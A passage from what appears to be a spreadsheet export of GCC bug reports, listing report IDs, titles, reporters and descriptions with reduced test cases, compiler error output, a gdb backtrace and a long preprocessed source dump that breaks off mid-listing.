  auto // compiler error see below
}
error: invalid initialization of non-const reference of type 'proxy&amp;' from an rvalue of type 'proxy'
For some reason the compiler deduces the wrong type early on and then fails when it later realizes the correct return type...
This problem can easily be observed with a std::vector which returns a proxy from its iterator. I have attached a minimal working example: The contained code (which creates a vector and iterates over its contents with a range-based for loop using auto&amp;&amp;) works in main() and in a normal function bar() but it fails to compile in foo() which is a function template.
GCC 4.6 and 4.7 compile foo() correctly.</t>
  </si>
  <si>
    <t>steffen.muething</t>
  </si>
  <si>
    <t>GCC-35458</t>
  </si>
  <si>
    <t>Dependency generation (-M) does not quote '#' in filenames</t>
  </si>
  <si>
    <t>Dependency generation (-M) does not quote '#' in filenames.</t>
  </si>
  <si>
    <t>markus.milleder</t>
  </si>
  <si>
    <t>GCC-5861</t>
  </si>
  <si>
    <t>g++ 2.95.3 ice on instantiation of non-trivial class template</t>
  </si>
  <si>
    <t>g++-bug.C: In instantiation of `Baz':
g++-bug.C:15:   instantiated from here
g++-bug.C:6: Internal compiler error.
g++-bug.C:6: Please submit a full bug report.
g++-bug.C:6: See  for instructions.
Release:
gcc version 2.95.3 20010315 (SuSE)
Environment:
vanilla SuSE 7.2 Linux on x86
How-To-Repeat:
// g++-bug.C
template struct Foo {
  template struct Bar {}
}
template struct Baz {
  Foo::Bar bar  // Clunk!
}
struct Thud {
  class Grunt {}
}
main()
{
  Baz baz
}</t>
  </si>
  <si>
    <t>meinlschmidt</t>
  </si>
  <si>
    <t>GCC-23702</t>
  </si>
  <si>
    <t>volatile const members of structures not treated as volatile</t>
  </si>
  <si>
    <t>Volatile const members of a struct are not generating a load when read while 
volatile non-const members are loaded (volatile const objects outside of a 
structure do generate a load when read). const members of a volatile struct 
generate two loads when read (strange code being produced in this case). This 
has been seen in 3.3.3 (for x86 and m68k targets) and 3.4.4 (for m68k targets 
untested on x86). The attached test.cpp file when compiled gcc -c -save-temps 
test.cpp on 3.3.3 under cygwin (x86 target) produces the attached test.s 
output. Multiple stores on volatile const members of structs get optimized 
away as well (this is not demonstrated in the attached test code). Note that 
when the test code is compiled as C rather than C++ correct code gets 
produced.</t>
  </si>
  <si>
    <t>Steve</t>
  </si>
  <si>
    <t>GCC-13174</t>
  </si>
  <si>
    <t>[tree-ssa] ICE in check_pointer_types_r at gimplify.c:3370</t>
  </si>
  <si>
    <t>Found while building arm-elf toolchain with latest tree-ssa compiler.  Will
upload .i file.
$ gcc --version
gcc (GCC) 3.5-tree-ssa 20031123 (merged 20031111)
Copyright (C) 2003 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
$  gcc -O1 -c earmelf.i
earmelf.c: In function `gldarmelf_add_options':
earmelf.c:2638: internal compiler error: in check_pointer_types_r at
gimplify.c:3370
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-67374</t>
  </si>
  <si>
    <t>std::cbegin can't call valarray range access functions</t>
  </si>
  <si>
    <t>This fails:
#include 
#include 
int main()
{
  std::valarray v
  std::cbegin(v)
}
The problem is that the begin overloads in  are not declared before the non-member functions in  so can't be called from there.
This works:
namespace std {
    template
      struct valarray
    template
    inline _Tp*
    begin(valarray
  /**
   *  @brief  Return an iterator pointing to the first element of
   *          the const valarray.
   *  @param  __va  valarray.
   */
  template
    inline const _Tp*
    begin(const valarray
}
#include 
#include 
int main()
{
  std::valarray v
  std::cbegin(v)
}</t>
  </si>
  <si>
    <t>GCC-33563</t>
  </si>
  <si>
    <t>[4.3 Regression] DSE removes non-dead store</t>
  </si>
  <si>
    <t>For gcc.dg/torture
/* { dg-do run } */
/* { dg-options --param max-aliased-vops=0 } */
struct T
{
  int a b
} t q
int main (void)
{
  struct T *p
  t.a = 1
  t.b = 2
  q = t
  t.a = 3
  if (q.a != 1)
    __builtin_abort ()
  return 0
}
the logic behind tree-ssa-dse.c:get_use_of_stmt_lhs is wrong.</t>
  </si>
  <si>
    <t>GCC-39687</t>
  </si>
  <si>
    <t>[4.5 Regression] Ada bootstrap is broken</t>
  </si>
  <si>
    <t>g-socket.adb:1219:04: (style) subprogram body has no previous spec
g-socket.adb:1219:13: warning: function Image is not referenced</t>
  </si>
  <si>
    <t>GCC-7469</t>
  </si>
  <si>
    <t>Problem Report 7184 can be closed</t>
  </si>
  <si>
    <t xml:space="preserve"> Hello gcc-gnats
   This problem wasn't caused by gcc source distribution itself it was
   likely to be caused by a wrong gcc 3.1 binary distribution obtained
   from hpux.cs.utah.edu (which probably has incorrectly patched header
   files). I tried it again and now (with my newly compiled gcc 3.1)
   this file compiles without any problem so the problem is outside
   gcc source tree.
   So I think the PR could be closed.
 Best regards Tim Yunaev
 Project Manager/Kaspersky Lab. Ltd
 __________________________________________________
 10 Geroyev Panfilovtsev Str. 125363 Moscow Russia
 Tel.: +7 095 797-8700 Fax: +7 095 948-4331
 http://www.kaspersky.com http://www.viruslist.com
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-2698</t>
  </si>
  <si>
    <t>RTL checking failures from the java testsuite</t>
  </si>
  <si>
    <t>The following RTL checking failures occur in the
java testsuite:
PR232.java:0: RTL check: expected code `code_label' have `note' in propagate_block_delete_insn at flow.c:3722
PR232.java:0: RTL check: expected code `code_label' have `note' in propagate_block_delete_insn at flow.c:3722
They also occur on the trunk.
Release:
3.0 20010428 (prerelease)
Environment:
i686-pc-linux-gnu
How-To-Repeat:
Bootstrap with RTL checking enabled and run the
java testsuite.</t>
  </si>
  <si>
    <t>GCC-48171</t>
  </si>
  <si>
    <t>Missing Save on -mavx and -mfma</t>
  </si>
  <si>
    <t>Save is missing on -mavx and -mfma in i386.opt:
[hjl@gnu-6 i386]$ grep ISA_ i386.opt  | grep -v Save
int ix86_isa_flags = TARGET_64BIT_DEFAULT | TARGET_SUBTARGET_ISA_DEFAULT
Target Report Mask(ISA_AVX) Var(ix86_isa_flags)
Target Report Mask(ISA_FMA) Var(ix86_isa_flags)
[hjl@gnu-6 i386]$</t>
  </si>
  <si>
    <t>GCC-81245</t>
  </si>
  <si>
    <t>[8 Regression] ICE building calculix with -Ofast</t>
  </si>
  <si>
    <t>This started with my copysign patch.
Here is a reduced testcase:
double sg[18]
void f(void)
{
  for (int i = 0 i &lt; 18i++)
  {
    if (sg[i] &lt; 0.0)
      sg[i] = -1.0
    else
      sg[i] = 1.0
  }
}
---- CUT ---
Compile with -Ofast.
0x6f53b4 flow_bb_inside_loop_p(loop const* basic_block_def const*)
        ../../gcc/gcc/cfgloop.c:794
0xd82b5b vect_stmt_relevant_p
        ../../gcc/gcc/tree-vect-stmts.c:326
0xd8366f vect_mark_stmts_to_be_vectorized(_loop_vec_info*)
        ../../gcc/gcc/tree-vect-stmts.c:664
0xdae127 vect_analyze_loop_2
        ../../gcc/gcc/tree-vect-loop.c:1944
0xdae127 vect_analyze_loop(loop* _loop_vec_info*)
        ../../gcc/gcc/tree-vect-loop.c:2403
0xdc4e4f vectorize_loops()
        ../../gcc/gcc/tree-vectorizer.c:614
Please submit a full bug report
From what I can tell is ifcvt clones the loop and ifconverts that loop only and enables it only for vectorization and that cloned loop has the a&gt;0.0?1.0:-1.0 optimized to copysign.</t>
  </si>
  <si>
    <t>GCC-23579</t>
  </si>
  <si>
    <t>[4.1 regression] rtl-optimization/23478 breaks Ada for ia64</t>
  </si>
  <si>
    <t>The patch from rtl-optimization/23478 breaks Ada:  
$ gdb --args ../../gnat1 -quiet -dumpbase a-stzmap.adb -O2 -W -Wall -fPIC -g  
-gnatpg -gnatO a-stzmap.o a-stzmap.adb -o /tmp/ccH9s7Af.s  
GNU gdb 6.3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a64-suse-linux...Using host libthread_db library  
/lib/tls/libthread_db.so.1.  
(gdb) r  
Starting program: /tmp/cvs/gcc-test-20050823/Build/gcc/gnat1 -quiet -dumpbase  
a-stzmap.adb -O2 -W -Wall -fPIC -g -gnatpg -gnatO a-stzmap.o a-stzmap.adb  
-o /tmp/ccH9s7Af.s  
Program received signal SIGSEGV Segmentation fault.  
add_missing_bbs (before=0x200000000043ad40 first=0x20000000003c0e38  
last=0x0)  
    at sched-ebb.c:220  
220           BB_HEAD (last) = before  
(gdb) bt  
#0  add_missing_bbs (before=0x200000000043ad40 first=0x20000000003c0e38   
    last=0x0) at sched-ebb.c:220  
#1  0x4000000000dbbd00 in schedule_ebbs (dump_file=0x20000000004dfc50)  
    at sched-ebb.c:329  
#2  0x4000000000b1f040 in ia64_reorg () at ia64.c:7701  
#3  0x4000000000db1b90 in rest_of_handle_machine_reorg () at reorg.c:3864  
#4  0x4000000000ac4ca0 in execute_one_pass (pass=0x60000000000156d0)  
    at passes.c:754  
#5  0x4000000000ac4f90 in execute_pass_list (pass=0x60000000000156d0)  
    at passes.c:837  
#6  0x4000000000ac4fe0 in execute_pass_list (pass=0x6000000000013338)  
    at passes.c:837  
#7  0x4000000000ac4fe0 in execute_pass_list (pass=0x6000000000013380)  
    at passes.c:837  
#8  0x40000000005dab80 in tree_rest_of_compilation (fndecl=0x20000000003eed00)  
    at tree-optimize.c:419  
#9  0x4000000000039690 in gnat_expand_body (gnu_decl=0x20000000003eed00)  
    at misc.c:636  
#10 0x4000000000b4b650 in cgraph_expand_function (node=0x20000000005af650)  
    at cgraphunit.c:1037  
#11 0x4000000000b4f8c0 in cgraph_optimize () at cgraphunit.c:1103  
#12 0x400000000003af60 in gnat_parse_file (set_yydebug=10846160) at  
misc.c:245#13 0x4000000000a57fd0 in toplev_main (argc=268536  
argv=0x6000000000041910)  
    at toplev.c:1932  
#14 0x40000000005c71c0 in main (argc=268536 argv=0x6000000000041910)  
    at main.c:35</t>
  </si>
  <si>
    <t>GCC-8570</t>
  </si>
  <si>
    <t>line number in error message is badly placed with illegal template friend declaration</t>
  </si>
  <si>
    <t>The line number in an error message with illegal is badly placed nowhere
near the offending friend declaration.
Release:
3.2
Environment:
System: SunOS alto 5.9 Generic sun4u sparc SUNWSun-Blade-1000
Architecture: sun4
host: sparc-sun-solaris2.9
build: sparc-sun-solaris2.9
target: sparc-sun-solaris2.9
configured with: ../gcc-3.2/configure --prefix=/space/bill/util --with-cpu=ultrasparc --enable-languages=cc++f77
How-To-Repeat:
With this file:
// templ-friend-bug.cc
template 
class X {
public:
  X() { }
private:
  template  friend class X
}
X i
// end
compiling with g++ 3.2 gives the following message:
? g++ -c templ-friend-bug.cc 
templ-friend-bug.cc: In instantiation of `X':
templ-friend-bug.cc:11:   instantiated from here
templ-friend-bug.cc:3: previous declaration `template class X'
templ-friend-bug.cc:3: used 2 template parameters instead of 1
?
the same occurs with 3.2.1 pre (20021110) and 3.3 pre (20021110)
it would be nice if it mentioned line 8 somewhere in the error message
(presumably the last line).  it took a great deal of time to find the
problem in my code with a rather large template.
my original code also got an ICE in 3.3 pre but this stripped down version
didn't.  i'll look into that separately.</t>
  </si>
  <si>
    <t>llib</t>
  </si>
  <si>
    <t>GCC-8580</t>
  </si>
  <si>
    <t>undefined references to std::char_traits</t>
  </si>
  <si>
    <t>Using a std::basic_string causes undefined references to std::char_traits::length(short const*) and to std::char_traits::copy(short* short const* unsigned)
Release:
3.2 and 3.3 20021113 (experimental) as well
Environment:
RedHat Linux 7.3
intel Pentium
How-To-Repeat:
compile undef.cpp using g++ undef.cpp and enjoy.
See readme.txt in the attached gzipped tar file for details.</t>
  </si>
  <si>
    <t>hklunder</t>
  </si>
  <si>
    <t>GCC-4415</t>
  </si>
  <si>
    <t>Compiler fails with message Internal compiler error in extract_insn at recog.c:2218</t>
  </si>
  <si>
    <t xml:space="preserve">Hi
I'm reporting a bug against gcc 3.0 according to the instructions posted. Please let me know if I missed any step. This is a gcc pre-release so if you are not interested in the bug report just let me know also.
zorzella@purple:/usr/src/MPlayer-0.50pre1/loader$ /usr/bin/gcc-3.0 -v
Reading specs from /usr/lib/gcc-lib/i386-linux/3.0.2/specs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i386-linux
Thread model: posix
gcc version 3.0.2 20010922 (Debian prerelease)
zorzella@purple:/usr/src/MPlayer-0.50pre1/loader$ /usr/bin/gcc-3.0 -I. -I.. -O4 -march=k6 -mcpu=k6 -pipe -ffast-math -fomit-frame-pointer -I/usr/local/include  -Wmissing-prototypes -Wimplicit-function-declaration -fno-omit-frame-pointer -DWIN32_PATH=\/usr/lib/win32\ -D__WINE__ -Ddbg_printf=__vprintf -DTRACE=__vprintf  -c win32.c
win32.c:1115:2: warning: #warning FIXME
win32.c:2512: warning: no previous prototype for `expUnknownMFC42_1176'
win32.c:2518: warning: no previous prototype for `expUnknownMFC42_1243'
win32.c: In function `expIsBadWritePtr':
win32.c:2902: Unrecognizable insn:
(insn 87 62 88 (parallel[ 
            (set (reg/v:SI 3 ebx [44])
                (const_int 0 [0x0]))
            (clobber (reg:CC 17 flags))
        ] ) -1 (nil)
    (expr_list:REG_UNUSED (reg:CC 17 flags)
        (nil)))
win32.c:2902: Internal compiler error in extract_insn at recog.c:2218
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
.i file pasted here
**********
# 14 win32.c
# 1 ../config.h 1
# 15 win32.c 2
# 1 win32.h 1
# 1 /usr/include/time.h 1 3
# 28 /usr/include/time.h 3
# 1 /usr/include/features.h 1 3
# 283 /usr/include/features.h 3
# 1 /usr/include/sys/cdefs.h 1 3
# 284 /usr/include/features.h 2 3
# 312 /usr/include/features.h 3
# 1 /usr/include/gnu/stubs.h 1 3
# 313 /usr/include/features.h 2 3
# 29 /usr/include/time.h 2 3
# 38 /usr/include/time.h 3
# 1 /usr/lib/gcc-lib/i386-linux/3.0.2/include/stddef.h 1 3
# 199 /usr/lib/gcc-lib/i386-linux/3.0.2/include/stddef.h 3
typedef unsigned int size_t
# 39 /usr/include/time.h 2 3
# 1 /usr/include/bits/time.h 1 3
# 39 /usr/include/bits/time.h 3
# 1 /usr/include/bits/types.h 1 3
# 26 /usr/include/bits/types.h 3
# 1 /usr/include/features.h 1 3
# 27 /usr/include/bits/types.h 2 3
# 1 /usr/lib/gcc-lib/i386-linux/3.0.2/include/stddef.h 1 3
# 30 /usr/include/bits/types.h 2 3
typedef unsigned char __u_char
typedef unsigned short __u_short
typedef unsigned int __u_int
typedef unsigned long __u_long
__extension__ typedef unsigned long long int __u_quad_t
__extension__ typedef long long int __quad_t
# 49 /usr/include/bits/types.h 3
typedef signed char __int8_t
typedef unsigned char __uint8_t
typedef signed short int __int16_t
typedef unsigned short int __uint16_t
typedef signed int __int32_t
typedef unsigned int __uint32_t
__extension__ typedef signed long long int __int64_t
__extension__ typedef unsigned long long int __uint64_t
typedef __quad_t *__qaddr_t
typedef __u_quad_t __dev_t
typedef __u_int __uid_t
typedef __u_int __gid_t
typedef __u_long __ino_t
typedef __u_int __mode_t
typedef __u_int __nlink_t
typedef long int __off_t
typedef __quad_t __loff_t
typedef int __pid_t
typedef int __ssize_t
typedef __u_long __rlim_t
typedef __u_quad_t __rlim64_t
typedef __u_int __id_t
typedef struct
  {
    int __val[2]
  } __fsid_t
typedef int __daddr_t
typedef char *__caddr_t
typedef long int __time_t
typedef unsigned int __useconds_t
typedef long int __suseconds_t
typedef long int __swblk_t
typedef long int __clock_t
typedef int __clockid_t
typedef int __timer_t
typedef int __key_t
typedef unsigned short int __ipc_pid_t
typedef long int __blksize_t
typedef long int __blkcnt_t
typedef __quad_t __blkcnt64_t
typedef __u_long __fsblkcnt_t
typedef __u_quad_t __fsblkcnt64_t
typedef __u_long __fsfilcnt_t
typedef __u_quad_t __fsfilcnt64_t
typedef __u_quad_t __ino64_t
typedef __loff_t __off64_t
typedef long int __t_scalar_t
typedef unsigned long int __t_uscalar_t
typedef int __intptr_t
typedef unsigned int __socklen_t
# 1 /usr/include/bits/pthreadtypes.h 1 3
# 23 /usr/include/bits/pthreadtypes.h 3
# 1 /usr/include/bits/sched.h 1 3
# 68 /usr/include/bits/sched.h 3
struct __sched_param
  {
    int __sched_priority
  }
# 24 /usr/include/bits/pthreadtypes.h 2 3
struct _pthread_fastlock
{
  long int __status
  int __spinlock
}
typedef struct _pthread_descr_struct *_pthread_descr
typedef struct __pthread_attr_s
{
  int __detachstate
  int __schedpolicy
  struct __sched_param __schedparam
  int __inheritsched
  int __scope
  size_t __guardsize
  int __stackaddr_set
  void *__stackaddr
  size_t __stacksize
} pthread_attr_t
typedef struct
{
  struct _pthread_fastlock __c_lock
  _pthread_descr __c_waiting
} pthread_cond_t
typedef struct
{
  int __dummy
} pthread_condattr_t
typedef unsigned int pthread_key_t
typedef struct
{
  int __m_reserved
  int __m_count
  _pthread_descr __m_owner
  int __m_kind
  struct _pthread_fastlock __m_lock
} pthread_mutex_t
typedef struct
{
  int __mutexkind
} pthread_mutexattr_t
typedef int pthread_once_t
# 140 /usr/include/bits/pthreadtypes.h 3
typedef unsigned long int pthread_t
# 144 /usr/include/bits/types.h 2 3
# 40 /usr/include/bits/time.h 2 3
extern long int __sysconf (int)
# 43 /usr/include/time.h 2 3
# 56 /usr/include/time.h 3
# 1 /usr/include/bits/types.h 1 3
# 57 /usr/include/time.h 2 3
typedef __clock_t clock_t
# 1 /usr/include/bits/types.h 1 3
# 68 /usr/include/time.h 2 3
typedef __time_t time_t
# 79 /usr/include/time.h 3
# 1 /usr/include/bits/types.h 1 3
# 80 /usr/include/time.h 2 3
typedef __clockid_t clockid_t
# 91 /usr/include/time.h 3
# 1 /usr/include/bits/types.h 1 3
# 92 /usr/include/time.h 2 3
typedef __timer_t timer_t
# 106 /usr/include/time.h 3
struct timespec
  {
    long int tv_sec
    long int tv_nsec
  }
struct tm
{
  int tm_sec
  int tm_min
  int tm_hour
  int tm_mday
  int tm_mon
  int tm_year
  int tm_wday
  int tm_yday
  int tm_isdst
  long int tm_gmtoff
  __const char *tm_zone
}
struct itimerspec
  {
    struct timespec it_interval
    struct timespec it_value
  }
struct sigevent
# 163 /usr/include/time.h 3
extern clock_t clock (void) 
extern time_t time (time_t *__timer) 
extern double difftime (time_t __time1 time_t __time0)
             __attribute__ ((__const__))
extern time_t mktime (struct tm *__tp) 
extern size_t strftime (char *__restrict __s size_t __maxsize
                        __const char *__restrict __format
                        __const struct tm *__restrict __tp) 
# 194 /usr/include/time.h 3
extern struct tm *gmtime (__const time_t *__timer) 
extern struct tm *localtime (__const time_t *__timer) 
extern struct tm *gmtime_r (__const time_t *__restrict __timer
                            struct tm *__restrict __tp) 
extern struct tm *localtime_r (__const time_t *__restrict __timer
                               struct tm *__restrict __tp) 
extern char *asctime (__const struct tm *__tp) 
extern char *ctime (__const time_t *__timer) 
extern char *asctime_r (__const struct tm *__restrict __tp
                        char *__restrict __buf) 
extern char *ctime_r (__const time_t *__restrict __timer
                      char *__restrict __buf) 
extern char *__tzname[2]
extern int __daylight
extern long int __timezone
extern char *tzname[2]
extern void tzset (void) 
extern int daylight
extern long int timezone
extern int stime (__const time_t *__when) 
# 271 /usr/include/time.h 3
extern time_t timegm (struct tm *__tp) 
extern time_t timelocal (struct tm *__tp) 
extern int dysize (int __year) __attribute__ ((__const__))
extern int nanosleep (__const struct timespec *__requested_time
                      struct timespec *__remaining) 
extern int clock_getres (clockid_t __clock_id struct timespec *__res) 
extern int clock_gettime (clockid_t __clock_id struct timespec *__tp) 
extern int clock_settime (clockid_t __clock_id __const struct timespec *__tp)
# 309 /usr/include/time.h 3
extern int timer_create (clockid_t __clock_id
                         struct sigevent *__restrict __evp
                         timer_t *__restrict __timerid) 
extern int timer_delete (timer_t __timerid) 
extern int timer_settime (timer_t __timerid int __flags
                          __const struct itimerspec *__restrict __value
                          struct itimerspec *__restrict __ovalue) 
extern int timer_gettime (timer_t __timerid struct itimerspec *__value)
extern int timer_getoverrun (timer_t __timerid) 
# 5 win32.h 2
# 1 wine/windef.h 1
# 11 wine/windef.h
# 1 ../config.h 1
# 12 wine/windef.h 2
# 149 wine/windef.h
typedef void VOID
typedef int INT
typedef unsigned int UINT
typedef unsigned short WORD
typedef unsigned long DWORD
typedef unsigned long ULONG
typedef unsigned char BYTE
typedef long LONG
typedef short SHORT
typedef unsigned short USHORT
typedef char CHAR
typedef unsigned char UCHAR
typedef LONG SCODE
typedef unsigned short WCHAR
typedef int WIN_BOOL
typedef double DATE
typedef double DOUBLE
typedef long long LONGLONG
typedef unsigned long long ULONGLONG
# 182 wine/windef.h
typedef UINT HANDLE
typedef HANDLE *LPHANDLE
typedef UINT WPARAM
typedef LONG LPARAM
typedef LONG HRESULT
typedef LONG LRESULT
typedef WORD ATOM
typedef WORD CATCHBUF[9]
typedef WORD *LPCATCHBUF
typedef HANDLE HHOOK
typedef HANDLE HMONITOR
typedef DWORD LCID
typedef WORD LANGID
typedef DWORD LCTYPE
typedef float FLOAT
typedef VOID *PVOID
typedef const void *PCVOID
typedef CHAR *PCHAR
typedef UCHAR *PUCHAR
typedef BYTE *PBYTE
typedef WORD *PWORD
typedef USHORT *PUSHORT
typedef SHORT *PSHORT
typedef ULONG *PULONG
typedef LONG *PLONG
typedef DWORD *PDWORD
typedef CHAR *LPSTR
typedef CHAR *PSTR
typedef const CHAR *LPCSTR
typedef const CHAR *PCSTR
typedef WCHAR *LPWSTR
typedef WCHAR *PWSTR
typedef const WCHAR *LPCWSTR
typedef const WCHAR *PCWSTR
typedef BYTE *LPBYTE
typedef WORD *LPWORD
typedef DWORD *LPDWORD
typedef LONG *LPLONG
typedef VOID *LPVOID
typedef const VOID *LPCVOID
typedef INT *PINT
typedef INT *LPINT
typedef UINT *PUINT
typedef UINT *LPUINT
typedef FLOAT *PFLOAT
typedef FLOAT *LPFLOAT
typedef WIN_BOOL *PWIN_BOOL
typedef WIN_BOOL *LPWIN_BOOL
typedef DWORD SEGPTR
# 262 wine/windef.h
typedef HANDLE HACMDRIVERID typedef HACMDRIVERID *PHACMDRIVERID typedef HACMDRIVERID *LPHACMDRIVERID
typedef HANDLE HACMDRIVER typedef HACMDRIVER *PHACMDRIVER typedef HACMDRIVER *LPHACMDRIVER
typedef HANDLE HACMOBJ typedef HACMOBJ *PHACMOBJ typedef HACMOBJ *LPHACMOBJ
typedef HANDLE HACMSTREAM typedef HACMSTREAM *PHACMSTREAM typedef HACMSTREAM *LPHACMSTREAM
typedef HANDLE HMETAFILEPICT typedef HMETAFILEPICT *PHMETAFILEPICT typedef HMETAFILEPICT *LPHMETAFILEPICT
typedef HANDLE HACCEL typedef HACCEL *PHACCEL typedef HACCEL *LPHACCEL
typedef HANDLE HBITMAP typedef HBITMAP *PHBITMAP typedef HBITMAP *LPHBITMAP
typedef HANDLE HBRUSH typedef HBRUSH *PHBRUSH typedef HBRUSH *LPHBRUSH
typedef HANDLE HCOLORSPACE typedef HCOLORSPACE *PHCOLORSPACE typedef HCOLORSPACE *LPHCOLORSPACE
typedef HANDLE HCURSOR typedef HCURSOR *PHCURSOR typedef HCURSOR *LPHCURSOR
typedef HANDLE HDC typedef HDC *PHDC typedef HDC *LPHDC
typedef HANDLE HDROP typedef HDROP *PHDROP typedef HDROP *LPHDROP
typedef HANDLE HDRVR typedef HDRVR *PHDRVR typedef HDRVR *LPHDRVR
typedef HANDLE HDWP typedef HDWP *PHDWP typedef HDWP *LPHDWP
typedef HANDLE HENHMETAFILE typedef HENHMETAFILE *PHENHMETAFILE typedef HENHMETAFILE *LPHENHMETAFILE
typedef HANDLE HFILE typedef HFILE *PHFILE typedef HFILE *LPHFILE
typedef HANDLE HFONT typedef HFONT *PHFONT typedef HFONT *LPHFONT
typedef HANDLE HICON typedef HICON *PHICON typedef HICON *LPHICON
typedef HANDLE HINSTANCE typedef HINSTANCE *PHINSTANCE typedef HINSTANCE *LPHINSTANCE
typedef HANDLE HKEY typedef HKEY *PHKEY typedef HKEY *LPHKEY
typedef HANDLE HMENU typedef HMENU *PHMENU typedef HMENU *LPHMENU
typedef HANDLE HMETAFILE typedef HMETAFILE *PHMETAFILE typedef HMETAFILE *LPHMETAFILE
typedef HANDLE HMIDI typedef HMIDI *PHMIDI typedef HMIDI *LPHMIDI
typedef HANDLE HMIDIIN typedef HMIDIIN *PHMIDIIN typedef HMIDIIN *LPHMIDIIN
typedef HANDLE HMIDIOUT typedef HMIDIOUT *PHMIDIOUT typedef HMIDIOUT *LPHMIDIOUT
typedef HANDLE HMIDISTRM typedef HMIDISTRM *PHMIDISTRM typedef HMIDISTRM *LPHMIDISTRM
typedef HANDLE HMIXER typedef HMIXER *PHMIXER typedef HMIXER *LPHMIXER
typedef HANDLE HMIXEROBJ typedef HMIXEROBJ *PHMIXEROBJ typedef HMIXEROBJ *LPHMIXEROBJ
typedef HANDLE HMMIO typedef HMMIO *PHMMIO typedef HMMIO *LPHMMIO
typedef HANDLE HPALETTE typedef HPALETTE *PHPALETTE typedef HPALETTE *LPHPALETTE
typedef HANDLE HPEN typedef HPEN *PHPEN typedef HPEN *LPHPEN
typedef HANDLE HQUEUE typedef HQUEUE *PHQUEUE typedef HQUEUE *LPHQUEUE
typedef HANDLE HRGN typedef HRGN *PHRGN typedef HRGN *LPHRGN
typedef HANDLE HRSRC typedef HRSRC *PHRSRC typedef HRSRC *LPHRSRC
typedef HANDLE HTASK typedef HTASK *PHTASK typedef HTASK *LPHTASK
typedef HANDLE HWAVE typedef HWAVE *PHWAVE typedef HWAVE *LPHWAVE
typedef HANDLE HWAVEIN typedef HWAVEIN *PHWAVEIN typedef HWAVEIN *LPHWAVEIN
typedef HANDLE HWAVEOUT typedef HWAVEOUT *PHWAVEOUT typedef HWAVEOUT *LPHWAVEOUT
typedef HANDLE HWINSTA typedef HWINSTA *PHWINSTA typedef HWINSTA *LPHWINSTA
typedef HANDLE HDESK typedef HDESK *PHDESK typedef HDESK *LPHDESK
typedef HANDLE HWND typedef HWND *PHWND typedef HWND *LPHWND
typedef HANDLE HKL typedef HKL *PHKL typedef HKL *LPHKL
typedef HANDLE HIC typedef HIC *PHIC typedef HIC *LPHIC
typedef HANDLE HRASCONN typedef HRASCONN *PHRASCONN typedef HRASCONN *LPHRASCONN
typedef HINSTANCE HMODULE
typedef HANDLE HGDIOBJ
typedef HANDLE HGLOBAL
typedef HANDLE HLOCAL
typedef HANDLE GLOBALHANDLE
typedef HANDLE LOCALHANDLE
typedef WIN_BOOL __attribute__((__stdcall__)) (* DATEFMT_ENUMPROCA)(LPSTR)
typedef WIN_BOOL __attribute__((__stdcall__)) (* DATEFMT_ENUMPROCW)(LPWSTR)
typedef WIN_BOOL __attribute__((__stdcall__)) (*DLGPROC)(HWNDUINTWPARAMLPARAM)
typedef LRESULT __attribute__((__stdcall__)) (*DRIVERPROC)(DWORDHDRVRUINTLPARAMLPARAM)
typedef INT __attribute__((__stdcall__)) (*EDITWORDBREAKPROCA)(LPSTRINTINTINT)
typedef INT __attribute__((__stdcall__)) (*EDITWORDBREAKPROCW)(LPWSTRINTINTINT)
typedef LRESULT __attribute__((__stdcall__)) (*FARPROC)()
typedef INT __attribute__((__stdcall__)) (*PROC)()
typedef WIN_BOOL __attribute__((__stdcall__)) (*GRAYSTRINGPROC)(HDCLPARAMINT)
typedef LRESULT __attribute__((__stdcall__)) (*HOOKPROC)(INTWPARAMLPARAM)
typedef WIN_BOOL __attribute__((__stdcall__)) (*PROPENUMPROCA)(HWNDLPCSTRHANDLE)
typedef WIN_BOOL __attribute__((__stdcall__)) (*PROPENUMPROCW)(HWNDLPCWSTRHANDLE)
typedef WIN_BOOL __attribute__((__stdcall__)) (*PROPENUMPROCEXA)(HWNDLPCSTRHANDLELPARAM)
typedef WIN_BOOL __attribute__((__stdcall__)) (*PROPENUMPROCEXW)(HWNDLPCWSTRHANDLELPARAM)
typedef WIN_BOOL __attribute__((__stdcall__)) (* TIMEFMT_ENUMPROCA)(LPSTR)
typedef WIN_BOOL __attribute__((__stdcall__)) (* TIMEFMT_ENUMPROCW)(LPWSTR)
typedef VOID __attribute__((__stdcall__)) (*TIMERPROC)(HWNDUINTUINTDWORD)
typedef WIN_BOOL __attribute__((__stdcall__)) (*WNDENUMPROC)(HWNDLPARAM)
typedef LRESULT __attribute__((__stdcall__)) (*WNDPROC)(HWNDUINTWPARAMLPARAM)
# 358 wine/windef.h
# 1 wine/windef.h 1
# 359 wine/windef.h 2
typedef short INT16
typedef unsigned short UINT16
typedef unsigned short WIN_BOOL16
typedef UINT16 HANDLE16
typedef HANDLE16 *LPHANDLE16
typedef UINT16 WPARAM16
typedef INT16 *LPINT16
typedef UINT16 *LPUINT16
typedef HANDLE16 HACMDRIVERID16 typedef HACMDRIVERID16 *PHACMDRIVERID16 typedef HACMDRIVERID16 *NPHACMDRIVERID16 typedef HACMDRIVERID16 *LPHACMDRIVERID16
typedef HANDLE16 HACMDRIVER16 typedef HACMDRIVER16 *PHACMDRIVER16 typedef HACMDRIVER16 *NPHACMDRIVER16 typedef HACMDRIVER16 *LPHACMDRIVER16
typedef HANDLE16 HACMOBJ16 typedef HACMOBJ16 *PHACMOBJ16 typedef HACMOBJ16 *NPHACMOBJ16 typedef HACMOBJ16 *LPHACMOBJ16
typedef HANDLE16 HACMSTREAM16 typedef HACMSTREAM16 *PHACMSTREAM16 typedef HACMSTREAM16 *NPHACMSTREAM16 typedef HACMSTREAM16 *LPHACMSTREAM16
typedef HANDLE16 HMETAFILEPICT16 typedef HMETAFILEPICT16 *PHMETAFILEPICT16 typedef HMETAFILEPICT16 *NPHMETAFILEPICT16 typedef HMETAFILEPICT16 *LPHMETAFILEPICT16
typedef HANDLE16 HACCEL16 typedef HACCEL16 *PHACCEL16 typedef HACCEL16 *NPHACCEL16 typedef HACCEL16 *LPHACCEL16
typedef HANDLE16 HBITMAP16 typedef HBITMAP16 *PHBITMAP16 typedef HBITMAP16 *NPHBITMAP16 typedef HBITMAP16 *LPHBITMAP16
